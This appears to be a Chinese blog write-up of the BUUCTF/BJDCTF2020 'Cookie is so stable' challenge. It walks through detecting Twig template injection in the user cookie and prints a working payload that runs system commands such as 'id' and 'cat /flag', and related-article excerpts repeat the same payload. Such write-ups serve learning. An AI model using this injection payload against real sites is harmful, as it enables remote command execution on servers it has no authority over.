buuctf web cookie is so subtle

最新推荐文章于 2022-02-18 21:12:29 发布
最新推荐文章于 2022-02-18 21:12:29 发布
阅读量935 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/122030644
版权

题目给出了hint,这题的主要利用方法在cookie里,在页面里的hint.php也让我们看看cookie
提交一个1,发现cookie里多了一个user=1
尝试user=admin,没用,直接回显。Hello,admin
考虑一下模板注入{{7*7}},回显,hello,49
到这这题就基本上结束了,查询到后端技术是PHP,查询了一下,php模板框架,常用的两种smarty或者twig
尝试{{$smarty.version}},失败,尝试twig注入的时候,发现成功回显
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“id”)}}
借鉴https://cloud.tencent.com/developer/article/1516336
https://xz.aliyun.com/t/7518#toc-5
成功拿到flag
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}}
参考视频链接:https://www.bilibili.com/video/BV1ia411k7JS/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BJDCTF-2020-Web-Cookie is so subtle!
feng的博客
11-02 692
知识点 Cookie(其实这个点可以不用管) SSTI WP 首先环境有三个页面,分别是index.php,flag.php,hint.php。hint.php的源码里有个提示: <!-- Why not take a closer look at cookies? --> 然后flag.php里是一个输入框,输入什么它就会回显什么。这时候看看cookie,发现突然多了user: 说明这个页面是根据cookie里的user来回显的。经过尝试,这里存在模板注入。 其实这题cookie没啥
[BJDCTF-2020]Web-Cookie is so subtle
Mrs_H的博客
11-12 605
[BJDCTF-2020]Web-Cookie is so subtle 一.前言 在上一篇有关thinkphp3.2版本的考古漏洞中,我曾提到要先将sql注入漏洞的学习放缓一阵,是时候转头去复习一下其他方面的漏洞了。关于SSTI的话,其实以前是有学习过的,但是大部分关于SSTI的学习都是通过一些简单基础的靶场习题进行学习的,并没有学太多原理方面的知识。从现在开始,要通过BUU的靶场对SSTI的类型习题做一下集中的复习了。 正文 作为我开始复习SSTI的第一篇习题,我并没有选择太难的题目,选择了一个较为简单
第 四 周 write up (BJDCTF-2020-Web-Cookie is so subtle! Bugku 蹭网先解开密码 [网鼎杯 2020 青龙组]AreUSerialz nmap)
tothemoon的博客
10-15 615
BJDCTF-2020-Web-Cookie is so subtle!(twig,ssti) 先百度 瞎测了一下,居然测出给git泄露了? 跑了下脚本,不是git泄露。 淦 重新开始 在hint下面发现了提示 在flag.php页面登陆后,抓包发现,cookie里面多了变量user。 看了大佬的提示:是模板注入,靠,这怎么想得到啊。菜鸡我是真的涨姿势了。 如果输入{{7*’7’}}如果 输出7777777 则是jinja2模板 如果是 49 则是 twig模板 这里输出了4
CTFHub Web真题(3星-6星)
qq_43936524的博客
05-20 1620
三星难度Web题 afr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
BJDCTF-2020-Web-Cookie is so subtle!(ssti模板注入+cookie处注入)
weixin_45844670的博客
09-24 571
既然提示了是和cookie有关系 那么先看cookie 没什么东西 然后去flag界面查看一下 发现多了一个user参数 这里存在注入 考虑可能是SSTI注入 尝试一下 123{{9+9}} 确实可以 存在twig模板注入 payload {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 参考链接:https://www.k0rz3n.com/2018/11/12/%E4
jquery生成cookie
06-29
Web开发中,Cookie是一种用于存储客户端数据的小型文本文件,它在浏览器和服务器之间传递信息,常用于用户会话管理、个性化设置等场景。jQuery是一个广泛使用的JavaScript库,它简化了DOM操作、事件处理以及Ajax...
Professional Web Design, Volume 2.pdf
08-14
Subtle Interactivity (Web Design Trends) 71 Context-Sensitive Navigation (Web Design Trends) 82 Rapid CSS3 Adaptation (Web Design Trends) 90 Responsive Web Design: What It Is and How to Use It 112...
Subtle
10-28
"Subtle"应该经过优化,确保在Web浏览器、移动设备以及桌面应用中的表现一致性。 7. **响应式设计**:在现代UI设计中,字体需要适应不同的屏幕尺寸和分辨率。"Subtle"可能具有良好的响应性,能够在小屏幕设备上保持...
subtle:使用画布的美丽细微粒子效果
05-17
设置设置简单右键单击文件,然后单击save as下载subtle.js文件。 将以下代码段添加到您的网站: <!-- Start of Subtle.js -->< script src =" subtle.js " > </ script >< script > ...
The Tangle Web
06-02
Every piece of the web application stack, from HTTP requests to browser-side scripts, comes with important yet subtle security consequences. To keep users safe, it is essential for developers to ...
python嵌套函数使用外部函数变量的方法(Python2和Python3)
09-21
主要介绍了python嵌套函数使用外部函数变量的方法,需要的朋友可以参考下
[BJDCTF2020]Cookie is so stable
夜幕下的灯火阑珊的博客
05-14 1957
知识点 SSTI twig 题目提示cookie 在user处尝试注入 {{7*'7'}} 回显7777777 ==> Jinja2 {{7*'7'}} 回显49 ==> Twig 这里为Twig payload {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.g...
BUUCTF [BJDCTF2020] Cookie is so stable
Senimo
01-03 437
BUUCTF [BJDCTF2020] Cookie is so stable 考点: Twig模版注入 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 首先启动环境: 其中导航栏包括Flag和Hint页面,依次点击查看,首先是Hint页面: 查看网页源码,得到: <h3>Welcome to BJDCTF 2020.Happy Game!</h3>
BUUCTF:[BJDCTF2020]Cookie is so stable
qq_46230755的博客
12-27 274
打开后发现有一个flag选项卡,进去后发现有一个输入框 简单测试一下 发现存在着模板注入 (别的师傅那copy的流程图) 如果是Twig,输入{{7*'7'}} 输出49 如果是Jinja,输入{{7*'7'}} 输出7777777 这题是Twig 在hint.php的源码中,对我们进行了提示 我们进行抓包,然后发现cookie里的user是注入点,直接构造payload user={{_self.env.registerUndefinedFilterCallback("exec")}}{.
【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 316
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 863
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
[BJDCTF2020]Cookie is so stable -wp
freerats的博客
08-02 276
经过测试,可以发现有ssti 在源码出发现提示,说关注cookie 登入后抓包 发现user处就是注入点 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 可以利用已知payload进行命令执行,获得flag。 漏洞利用请参考https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%..
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2504
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
Subtle remover
最新发布
08-17
引用中的函数rm_custom_stops是一个自定义的停用词移除函数,它接受一个字符串句子作为参数,并返回一个清理后的句子作为单词列表。在这个函数中,定义了一个包含需要移除的停用词的集合stop_words,然后通过列表推导式去除句子中的停用词,最终返回一个不包含停用词的单词列表。 引用和提到了一个网络,该网络可以实现化妆的迁移和卸妆。与之前的方法不同,这个网络能够同时处理化妆迁移和卸妆。此外,统一的训练过程能够考虑不同区域妆彩之间的关系,并且端对端网络本身能够学习源图像中输入妆彩的适应性,从而避免了后期处理的需要。中的rm_custom_stops函数来去除句子中的停用词。这样可以在保留句子的语义的同时,去除一些常见的无意义单词,使句子更加精炼。然后,你可以使用引用和中提到的网络来进行化妆的迁移和卸妆。这个网络不仅可以迁移不同的化妆效果,还能够同时实现卸妆功能,而且它的训练过程还能够考虑不同区域妆彩之间的关系,从而得到更好的效果。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【自然语言处理】情感分析(一):基于 NLTK 的 Naive Bayes 实现](https://blog.csdn.net/be_racle/article/details/128761017)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [BeautyGAN论文翻译](https://blog.csdn.net/Leytton/article/details/102932180)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值